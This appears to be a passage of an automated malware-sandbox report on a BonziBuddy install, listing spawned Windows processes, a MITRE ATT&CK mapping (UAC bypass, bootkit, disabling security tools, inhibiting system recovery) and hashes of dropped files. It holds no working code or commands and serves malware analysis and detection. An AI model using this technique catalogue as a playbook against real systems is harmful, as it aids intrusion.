C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6124

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2828

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6984

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:6312

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5084

C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
1⤵
PID:5892

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
1⤵
PID:4352

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1140

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4920

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17414 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6100

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17418 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5888

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1628

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3228

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:4184

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:10872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2552 -ip 2552
1⤵
PID:9728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 8172 -ip 8172
1⤵
PID:5452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\BonziBuddy432\ActiveSkin.ocx

Filesize
336KB

MD5
3d225d8435666c14addf17c14806c355

SHA1
262a951a98dd9429558ed35f423babe1a6cce094

SHA256
2c8f92dc16cbf13542ddd3bf0a947cf84b00fed83a7124b830ddefa92f939877

SHA512
391df24c6427b4011e7d61b644953810e392525743914413c2e8cf5fce4a593a831cfab489fbb9517b6c0e7ef0483efb8aeaad0a18543f0da49fa3125ec971e1

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_2.EXE

Filesize
796KB

MD5
8a30bd00d45a659e6e393915e5aef701

SHA1
b00c31de44328dd71a70f0c8e123b56934edc755

SHA256
1e2994763a7674a0f1ec117dae562b05b614937ff61c83b316b135afab02d45a

SHA512
daf92e61e75382e1da0e2aba9466a9e4d9703a129a147f0b3c71755f491c68f89ad67cfb4dd013580063d664b69c8673fb52c02d34b86d947e9f16072b7090fb

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE

Filesize
2.5MB

MD5
73feeab1c303db39cbe35672ae049911

SHA1
c14ce70e1b3530811a8c363d246eb43fc77b656c

SHA256
88c03817ae8dfc5fc9e6ffd1cfb5b829924988d01cd472c1e64952c5398866e8

SHA512
73f37dee83664ce31522f732bf819ed157865a2a551a656a7a65d487c359a16c82bd74acff2b7a728bb5f52d53f4cfbea5bef36118128b0d416fa835053f7153

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE

Filesize
3.2MB

MD5
93f3ed21ad49fd54f249d0d536981a88

SHA1
ffca7f3846e538be9c6da1e871724dd935755542

SHA256
5678fd744faddb30a87568ae309066ef88102a274fff62f10e4963350da373bc

SHA512
7923556c6d6feb4ff4253e853bae3675184eab9b8ce4d4e07f356c8624317801ee807ad5340690196a975824ea3ed500ce6a80c7670f19785139be594fa5e70f

Download Submit
C:\Program Files (x86)\BonziBuddy432\BonziCheckers.ocx

Filesize
152KB

MD5
66551c972574f86087032467aa6febb4

SHA1
5ad1fe1587a0c31bb74af20d09a1c7d3193ec3c9

SHA256
9028075603c66ca2e906ecac3275e289d8857411a288c992e8eef793ed71a75b

SHA512
35c1f500e69cdd12ec6a3c5daef737a3b57b48a44df6c120a0504d340e0f721d34121595ed396dc466a8f9952a51395912d9e141ad013000f5acb138b2d41089

Download Submit
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page17.jpg

Filesize
50KB

MD5
e8f52918072e96bb5f4c573dbb76d74f

SHA1
ba0a89ed469de5e36bd4576591ee94db2c7f8909

SHA256
473a890da22defb3fbd643246b3fa0d6d34939ac469cd4f48054ee2a0bc33d82

SHA512
d57dd0a9686696487d268ef2be2ec2d3b97baedf797a63676da5a8a4165cda89540ec2d3b9e595397cbf53e69dcce76f7249f5eeff041947146ca7bf4099819f

Download Submit
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page18.jpg

Filesize
45KB

MD5
108fd5475c19f16c28068f67fc80f305

SHA1
4e1980ba338133a6fadd5fda4ffe6d4e8a039033

SHA256
03f269cd40809d7ec94f5fa4fff1033a624e849179962693cdc2c37d7904233b

SHA512
98c8743b5af89ec0072b70de8a0babfb5aff19bafa780d6ce99c83721b65a80ec310a4fe9db29a4bb50c2454c34de62c029a83b70d0a9df9b180159ea6cad83a

Download Submit
C:\Program Files (x86)\BonziBuddy432\MSCOMCTL.OCX

Filesize
1.0MB

MD5
12c2755d14b2e51a4bb5cbdfc22ecb11

SHA1
33f0f5962dbe0e518fe101fa985158d760f01df1

SHA256
3b6ccdb560d7cd4748e992bd82c799acd1bbcfc922a13830ca381d976ffcccaf

SHA512
4c9b16fb4d787145f6d65a34e1c4d5c6eb07bff4c313a35f5efa9dce5a840c1da77338c92346b1ad68eeb59ef37ef18a9d6078673c3543656961e656466699cf

Download Submit
C:\Program Files (x86)\BonziBuddy432\MSINET.OCX

Filesize
112KB

MD5
7bec181a21753498b6bd001c42a42722

SHA1
3249f233657dc66632c0539c47895bfcee5770cc

SHA256
73da54b69911bdd08ea8bbbd508f815ef7cfa59c4684d75c1c602252ec88ee31

SHA512
d671e25ae5e02a55f444d253f0e4a42af6a5362d9759fb243ad6d2c333976ab3e98669621ec0850ad915ee06acbe8e70d77b084128fc275462223f4f5ab401bc

Download Submit
C:\Program Files (x86)\BonziBuddy432\MSWINSCK.OCX

Filesize
105KB

MD5
9484c04258830aa3c2f2a70eb041414c

SHA1
b242a4fb0e9dcf14cb51dc36027baff9a79cb823

SHA256
bf7e47c16d7e1c0e88534f4ef95e09d0fd821ed1a06b0d95a389b35364b63ff5

SHA512
9d0e9f0d88594746ba41ea4a61a53498619eda596e12d8ec37d01cfe8ceb08be13e3727c83d630a6d9e6d03066f62444bb94ea5a0d2ed9d21a270e612db532a0

Download Submit
C:\Program Files (x86)\BonziBuddy432\Reg.nbd

Filesize
99B

MD5
4de674e08ea9abd1273dde18b1197621

SHA1
7592a51cf654f0438f8947b5a2362c7053689fd8

SHA256
56010f4c8f146425eb326c79cbad23367301e6a3bc1e91fdcd671ce9f5fc4b63

SHA512
976d5772c2b42616cf948f215a78fa47d8154798abf1148f7f750545ed3de9ec1ecdf2e7e16b99c1459e5519a81301b9c1e6864e992a807b78257f0abaecc4c8

Download Submit
C:\Program Files (x86)\BonziBuddy432\Reg.nbd

Filesize
140B

MD5
a8ed45f8bfdc5303b7b52ae2cce03a14

SHA1
fb9bee69ef99797ac15ba4d8a57988754f2c0c6b

SHA256
375ecd89ee18d7f318cf73b34a4e15b9eb16bc9d825c165e103db392f4b2a68b

SHA512
37917594f22d2a27b3541a666933c115813e9b34088eaeb3d74f77da79864f7d140094dfac5863778acf12f87ccda7f7255b7975066230911966b52986da2d5c

Download Submit
C:\Program Files (x86)\BonziBuddy432\Regicon.ocx

Filesize
76KB

MD5
32ff40a65ab92beb59102b5eaa083907

SHA1
af2824feb55fb10ec14ebd604809a0d424d49442

SHA256
07e91d8ed149d5cd6d48403268a773c664367bce707a99e51220e477fddeeb42

SHA512
2cfc5c6cb4677ff61ec3b6e4ef8b8b7f1775cbe53b245d321c25cfec363b5b4975a53e26ef438e07a4a5b08ad1dde1387970d57d1837e653d03aef19a17d2b43

Download Submit
C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat

Filesize
279B

MD5
4877f2ce2833f1356ae3b534fce1b5e3

SHA1
7365c9ef5997324b73b1ff0ea67375a328a9646a

SHA256
8ae1ed38bc650db8b14291e1b7298ee7580b31e15f8a6a84f78f048a542742ff

SHA512
dd43ede5c3f95543bcc8086ec8209a27aadf1b61543c8ee1bb3eab9bc35b92c464e4132b228b12b244fb9625a45f5d4689a45761c4c5263aa919564664860c5e

Download Submit
C:\Program Files (x86)\BonziBuddy432\SSCALA32.OCX

Filesize
472KB

MD5
ce9216b52ded7e6fc63a50584b55a9b3

SHA1
27bb8882b228725e2a3793b4b4da3e154d6bb2ea

SHA256
8e52ef01139dc448d1efd33d1d9532f852a74d05ee87e8e93c2bb0286a864e13

SHA512
444946e5fc3ea33dd4a09b4cbf2d41f52d584eb5b620f5e144de9a79186e2c9d322d6076ed28b6f0f6d0df9ef4f7303e3901ff552ed086b70b6815abdfc23af7

Download Submit
C:\Program Files (x86)\BonziBuddy432\SSCALB32.OCX

Filesize
320KB

MD5
97ffaf46f04982c4bdb8464397ba2a23

SHA1
f32e89d9651fd6e3af4844fd7616a7f263dc5510

SHA256
5db33895923b7af9769ca08470d0462ed78eec432a4022ff0acc24fa2d4666e1

SHA512
8c43872396f5dceb4ba153622665e21a9b52a087987eab523b1041031e294687012d7bf88a3da7998172010eae5f4cc577099980ecd6b75751e35cfc549de002

Download Submit
C:\Program Files (x86)\BonziBuddy432\Uninstall.exe

Filesize
65KB

MD5
578bebe744818e3a66c506610b99d6c3

SHA1
af2bc75a6037a4581979d89431bd3f7c0f0f1b1f

SHA256
465839938f2baec7d66dbc3f2352f6032825618a18c9c0f9333d13af6af39f71

SHA512
d24fcd2f3e618380cf25b2fd905f4e04c8152ee41aeee58d21abfc4af2c6a5d122f12b99ef325e1e82b2871e4e8f50715cc1fc2efcf6c4f32a3436c32727cd36

Download Submit
C:\Program Files (x86)\BonziBuddy432\ssa3d30.ocx

Filesize
320KB

MD5
48c35ed0a09855b29d43f11485f8423b

SHA1
46716282cc5e0f66cb96057e165fa4d8d60fbae2

SHA256
7a0418b76d00665a71d13a30d838c3e086304bacd10d764650d2a5d2ec691008

SHA512
779938ec9b0f33f4cbd5f1617bea7925c1b6d794e311737605e12cd7efa5a14bbc48bee85208651cf442b84133be26c4cc8a425d0a3b5b6ad2dc27227f524a99

Download Submit
C:\Program Files (x86)\BonziBuddy432\sstabs2.ocx

Filesize
288KB

MD5
7303efb737685169328287a7e9449ab7

SHA1
47bfe724a9f71d40b5e56811ec2c688c944f3ce7

SHA256
596f3235642c9c968650194065850ecb02c8c524d2bdcaf6341a01201e0d69be

SHA512
e0d9cb9833725e0cdc7720e9d00859d93fc51a26470f01a0c08c10fa940ed23df360e093861cf85055b8a588bb2cac872d1be69844a6c754ac8ed5bfaf63eb03

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe

Filesize
2.9MB

MD5
46f875f1fe3d6063b390e3a170c90e50

SHA1
62b901749a6e3964040f9af5ddb9a684936f6c30

SHA256
1cf9d3512efffaa2290c105ac8b7534026604067c9b533e7b7df2e017569a4ec

SHA512
fdfb348061158f8133380e9a94215f4bfc0f6ce643a129d623cb8034c49144f1489de56cd076da645478506d9fbddc7590fe3d643622210084b15fdf0d16b557

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

Filesize
289KB

MD5
7860e3970ea0b5feca1d717352d8f5b2

SHA1
3e983bfc91cfa0db588b48cc8eb5bdb139a989a9

SHA256
6838db5da53801d4c6e11a5a2f736ef241e18a973cf058805ea8e1818ddace22

SHA512
5f34d0a53df82b9383b11eaddb3e90495d7c5d51a8ad9911c51057e5234d5ead11861538b106e4f8f43a90cd416f7198a7e67d46261f2135518b5b221672d644

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

Filesize
621B

MD5
6ca4097602f21896e92666fd110e5ac3

SHA1
2b476881125c898ae5bc07e78160533b47e1f254

SHA256
976b23b71ffae5ea1091c7ddbf2ea8b510446ec9c1600e058e4614154e661e7a

SHA512
10a74e4389bebb59136a0f4ad8a146be4c65be7ace1f16f0b6efd2e73959686de6c4abb240a872d7a8ee7e75e3dac2a20ee46e673f9eacc0d0be46bbc47a3171

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

Filesize
654B

MD5
3f3d3eafed6747b31b5552d39d455575

SHA1
46ef80331b79b4d53d0f010487a55db04617d3c1

SHA256
d0b5b74ec760c9739fa54427cf0e59b6c5d7923ab2ca81fb5de336e83fd440de

SHA512
4769551f9be6cd939146ea0c04ce6b03109aed1bcf3b79b5f1cbd1e502b993d297caa0e684b9a4eacfa7bb7ac78c4920580664f906bcda3ace9b003800b19399

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat

Filesize
8B

MD5
0b674601f7b05d903b1fd9240dcab05e

SHA1
967d0951906268c1de5338c22c8f717a6842c37c

SHA256
993410fed220fad8d480d612bd871002bc5999430cca7b43d96bf6dc7ad1a611

SHA512
f421035305f6caf745c5c4b0a72cfb6495c13317cc5eed2de3f55fb5329b2874bc0bb399562c9d0763d6230c22dba09fc43f1f64c8d77438ecd86cce1d780ee8

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\expapply64.dll

Filesize
473KB

MD5
76a6c5124f8e0472dd9d78e5b554715b

SHA1
88ab77c04430441874354508fd79636bb94d8719

SHA256
d23706f8f1c3fa18e909fe028d612d56df7cd4f9ad0c3a2b521cb58e49f3925d

SHA512
35189cc2bf342e9c6e33fd036f19667398ac53c5583c9614db77fb54aadf9ac0d4b96a3e5f41ec7e8e7f3fe745ae71490bdcf0638d7410b12121e7a4312fae9e

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mb5uns.exe

Filesize
3.9MB

MD5
dfd900def4742b3565bc9aa63ec11af5

SHA1
c1cefc356045ccf20ebc98f6c48b2a85f0d32465

SHA256
eae4a33cfa155a9f5f520816b42dc4f4012d5c7c916dc756b3de025a3062a461

SHA512
bb2b4daa121dab894ad036648eff6f81e9be97840b4be7ba54b7df0383cf863b157d6088814a0d63c7523751f8c68d9b5c1f247512d7587348750c1b71ef3b3e

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mbamsi64.dll

Filesize
2.9MB

MD5
2bd56c416d5c9d7292d146991a9769ba

SHA1
5138267b87f8d6a32e4419c29dd95b8fae3a3088

SHA256
3568491907c506b55206768eac000e76074eb705a18962f7297d5a2814b7b4f5

SHA512
524bae54186692aad44ef931b5be7df229850c961d89d59fbd7f0d98f2981def46c0111e4cba24b2d9140abe6a5071ee14ef1cac44cff3eedd7a1cd5fd5f5f84

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf

Filesize
1KB

MD5
5d1917024b228efbeab3c696e663873e

SHA1
cec5e88c2481d323ec366c18024d61a117f01b21

SHA256
4a350fc20834a579c5a58352b7a3aa02a454abbbd9eecd3cd6d2a14864a49cd8

SHA512
14b345f03284b8c1d97219e3dd1a3910c1e453f93f51753f417e643f50922e55c0e23aab1d437300e6c196c7017d7b7538de4850df74b3599e90f3941b40ab4a

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.cat

Filesize
10KB

MD5
ddb20ff5524a3a22a0eb1f3e863991a7

SHA1
260fbc1f268d426d46f3629e250c2afd0518ed24

SHA256
5fc1d0838af2d7f4030e160f6a548b10bf5ca03ea60ec55a09a9adbbb056639a

SHA512
7c6970e35395663f97e96d5bf7639a082e111fa368f22000d649da7a9c81c285ee84b6cf63a4fccb0990e5586e70e1b9efc15cf5e4d40946736ca51ec256e953

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.inf

Filesize
2KB

MD5
d87c2f68057611e687bdb8cc6ebea5b8

SHA1
27b1311d3b199e4c22772fa1b7ea556805775d37

SHA256
ff93773f55bf4a6a0242adf82276a8c95c0b244b9bc05e515c4e810c81a960e8

SHA512
4aa65b8911d8a2a0f9ef0ee6e934b94db0a9ad4c2ec543b5edcf21486be43f6ab1fda6617ea2cbb85eff230628c9fa8e7649da915d6de695803b28e55bef5819

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.sys

Filesize
233KB

MD5
246a1d7980f7d45c2456574ec3f32cbe

SHA1
c5fad4598c3698fdaa4aa42a74fb8fa170ffe413

SHA256
45948a1715f0420c66a22518a1a45a0f20463b342ce05d36c18b8c53b4d78147

SHA512
265e6da7c9eede8ea61f204b3524893cf9bd1ed11b338eb95c4a841428927cccbed02b7d8757a4153ce02863e8be830ea744981f800351b1e383e71ddaad36ad

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.cat

Filesize
11KB

MD5
1c69ac8db00c3cae244dd8e0ac5c880e

SHA1
9c059298d09e63897a06d0d161048bdadfa4c28a

SHA256
02d57ac673352e642f111c71edbb18b9546b0b29f6c6e948e7f1c59bd4c36410

SHA512
d2ec2ff9fea86d7074998c53913373c05b84ddd8aa277f6e7cda5a4dfffd03273d271595a2f0bf432b891775bdd2e8f984c733998411cfc71aff2255511b29c9

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.inf

Filesize
2KB

MD5
358bb9bf66f2e514310dc22e4e3a4dc5

SHA1
87bfc1398e6756273eee909a0dfb4ef18b38d17c

SHA256
ff51780a5a854b2c18f71ae426cb066a13723ef6155e24f4910137c9e8dfdc17

SHA512
301ec5ec5c0813951843011f2204924240235494999136ea30a557cbf58146fc6043a8866b344fa7deb927d7c83d44e2aaf45adca7d221aba5d36715b9a63e09

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.sys

Filesize
196KB

MD5
954e9bf0db3b70d3703e27acff48603d

SHA1
d475a42100f6bb2264df727f859d83c72829f48b

SHA256
8f7ae468dba822a4968edbd0a732b806e453caaff28a73510f90cb5e40c4958a

SHA512
0e367ce106820d76994e7a8221aaaab76fda21d40aede17a8fe7dedaca8f691b345b95cf7333eb348419bc5f8ea8618949783717100b38ed92544b9199f847f0

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.cat

Filesize
11KB

MD5
91822615a1481ff43eeca0b430fe9ca1

SHA1
5bdef1c6aabafce0177fa1b21b94e2d2b48afc3d

SHA256
a1afbd8b08c848af6c0962bd44c772bfa007daa0e878c20f81a6552811ad4376

SHA512
9f3c473c32e1c079a75d183d565991bb3216cd89f78e4ffc0300a079c0d761c6047a472705ea557728368c096bf08912a523d55fa0367f708113cd70951d6aeb

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.inf

Filesize
3KB

MD5
5a9717e1385703e8f06b27aa10a69e87

SHA1
84ee67a9167b5eb6560711b9871de98898ad07a5

SHA256
47b7c516bb57c612de19f0ca865590af95b6e32bf873a0fef9e011b2c5b483d4

SHA512
dd3c7278c2c11ad15a55fae6d19b96dadd92f85b7f0c8ce934298258af00bb5c052a84a98499b8867b0f43704fb307c67d03692ca69dda4d814c6c17dd73df44

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.sys

Filesize
216KB

MD5
7764c438ad9a4f024d60c77b82f2721f

SHA1
64e478e83bde2965216a37f283beb2695997b69d

SHA256
3f51a3149e6a79cd71fcb1451660196b6ba59c3b687736f59b24e5dab425d73c

SHA512
bbbac97b950d20621ae396a7f8ba8ec990ad056e2180bfa10d11b4eaccf3680e8830d652b7972bae52826535bfc68ae8c1e4ee93071c954ec7f8dbc7a6dcfd84

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\version.dat

Filesize
47B

MD5
ecbdf431e12c4b470674fc30ac2441ce

SHA1
ff65d91abbaea7fa9a12e0a1fc136f720bee0885

SHA256
15567ebbb9f4c387dc1e6e617c63b3055f9c555400db8bbe07d0f1b36d815c07

SHA512
53ab7f54562210254a759b829bdf41b580789a7ed180c49cc71ce4b096a4663d09ee103641afe2bd80b4e3d56a27013b1ed3a0abbce3f0764a7e9d4d8fbd5106

Download Submit
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
87a8c2566010e15b1d18c55e0599adab

SHA1
4703cdc1b8450e9c6cd748e92181ddd94e44946a

SHA256
2afe8f0b09135dacd9094d32c4adafa297bcfb060638a8c4365dd5fb331296ea

SHA512
3c33fe9783fbbc7f7248380ae1e5bbe3dbdc8164b2ba0a8aa83bc7a64edbfaa551a18cae5783940277269ea7c4d6d13523119c77d537c663599edceb79a6dc02

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\AMECls

Filesize
974KB

MD5
ea6ae3c885fe50569640ea928220637a

SHA1
9556b3caec45ac99cdd6149042746365759d8322

SHA256
2407fa2de2c9d48c4ecd019307e20a76c0cd84fbdb6aef3cd952594333ea2a02

SHA512
9a4386a5e65b3ff9298c212fe6fbe842be13de332ba9dcc8768b031bdf454c502b0476084c026fb1ceb0eb2bbb41eb333b5852fa8cbfe36b7a9572706cbaf9c6

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\AMECls

Filesize
1009KB

MD5
12fa31bb3f49df16e7f9395baf8e7e02

SHA1
14af7dc84d18d32812227603068cea8f50e6d4de

SHA256
7a3b53afe653e422af6c0ce76eea343d9b70bfc22409540e9d47321bb648d3b0

SHA512
15f65a6ca98d6ac8322d3528bdae0f7fb28ae801876371bdcc98555186995e77dfe8fafef85773eba2219a2376aed55914ccbfb849ad42c1ac374b6f271f0c4c

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\AMECls

Filesize
952KB

MD5
d317dc1795c402381c0bdfb514cf9dc5

SHA1
b8a8a8bae82aa31791eede3e88774ee8409fa1b1

SHA256
d55babd8ce9802dd50a4123c60891945d9b2a588f5fefa282bd19a92ddd1bab1

SHA512
871f9c5489d3eab36eed69d6bc0cecf914b399d151440d48dd92de79af80f4336016a8cdce048d4e0d0e230ba9240ff2fc612e6a292ff3500072d2f4c6c034db

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\DDSCls

Filesize
334KB

MD5
c056ddce4571b9466e55fee7a8b8e382

SHA1
37e3a3c3308417d63a78f028767c6dffe2cc48b4

SHA256
561956b0211b28fa13a67c78960ad82c673915224c73111b816f3ed2e266a2a4

SHA512
f53bf1b6e586ac12057da3aad46728a38be6675a02c2ef513c4ff109191997c9b7d029ac909e926bc1532240bf03f55ba72c947c68d604c52bb16203ac5f1f7b

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\DDSCls

Filesize
345KB

MD5
0f6e06f5512f6b6c8a9944c7295fcc17

SHA1
c07544391fd97fd9c01dd41f0269fb34ed146f6a

SHA256
464a11bc499e0bb898c4d826a2d00cb57eb47f168facfc1169960855744856bd

SHA512
58f8f24fd032b73101aa9ba435b4a41e7e9a99c3d00888358e3bcc8ad4d646be40197f53089aaa934926c8dae50a59f755a1a5620a14039adb2279d77fc0e2a1

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\DDSCls

Filesize
325KB

MD5
9e3a653f9ee2cfacae88ab2d8c1010cf

SHA1
ae32a67356d0bfc8177075825ece5eb590482e81

SHA256
8296c4aae689cdd67966d6b2ffacfd5099dc5efd383b41c615990628927e8618

SHA512
3eb4f1509b4c95e1c49b34a849710a34e9088f9c788f42bad96d7c2940c23e449f327b5a4f089a96efbfa837e7bcbe9fcc99d3ea11e99fd7d5ef14f0c1764735

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\Global.nm

Filesize
335KB

MD5
17a5a9c411982e050a1313b0af4a5aee

SHA1
cdbf6526b8d07bd5cee14d62d59a82ea41ac098f

SHA256
2a53081896be414f829b85552d758f3ff9aaf51c5594de9dd1e8f8946cec7c02

SHA512
68ad6ef7273dd2553416fceb99889adb5d1ee89c55be0ac576a37c5693bcc5cf1761a5da6d3fb96dcdb3a79e9195bdc8f73305c62ed332746ad14783dec427b4

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\Global.sr

Filesize
18.5MB

MD5
ed017ac1137ed16f13f5238d2054790c

SHA1
3a3aca7f75688119d1d86f8dcc498700898e4ce0

SHA256
8897874f87e2ac01d63489c162c48219b64ad283a174ef3b8eae027592d00ec6

SHA512
fe449dfefbf75dbbfa986ff5aea3afc58cdbe105892d766868ce57ec457cc565b449aa52a4063e65de8b9d0760ecf321d3134cb9e399778c7e265d2b561fc41c

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\LOGS\mbae-default.log

Filesize
1KB

MD5
c97de116ea9139cfa0b7a3edebe0a961

SHA1
58fa9894669e18c56ffd0419051d7b9388ef27ea

SHA256
de0a57a22beddb1fdae0f2ef49d9f1877d02a39215b5bcfb63a82233d7fb80f1

SHA512
ab86df82bacc6b305f285c32c1f5fdcdf9cc81e3601deeaa0afc76335889d6f69cfea7236ab6f0120095a23b5f9645e78c4736ec3579fa50541966bfd07477ea

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\6a65b9b6-3fb2-11ef-b443-eefa7036a957.data

Filesize
2KB

MD5
5229869b6c2c852519b78a6a5e7acd2e

SHA1
084d4443887bca7e930b3b7f378b6d79ad18a83c

SHA256
57c55254e7b1c211286da55c14f59574346236721a0ada4f3a5ced7746baed2b

SHA512
1552414938af59f45a9e6be3a6589e27e8b6ac6c9ef50b53a3e44b90c0ad3f62aec491a9ed165227ef0af9a2df2d9df866213f65144b92ee2562adbc71604b31

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\733f2c12-3fb1-11ef-bc13-eefa7036a957.data

Filesize
2KB

MD5
4f52aac04e76cdff0bab01e8cecf2d01

SHA1
284b0e8ed555e452f8a53e581f8c92326bdf46ef

SHA256
0cfcc1625a4e49dfbc6dc4a482a345f60e74c4aa52a49b9be7d52d2af79a6c84

SHA512
50ac96461ea280af90de6cc442675525fbf70c1811d9399ad086db484516726c98aad297cc024c14dd1e88e89b3400cc56913fa879839c56be91e95613e85ab9

Download Submit
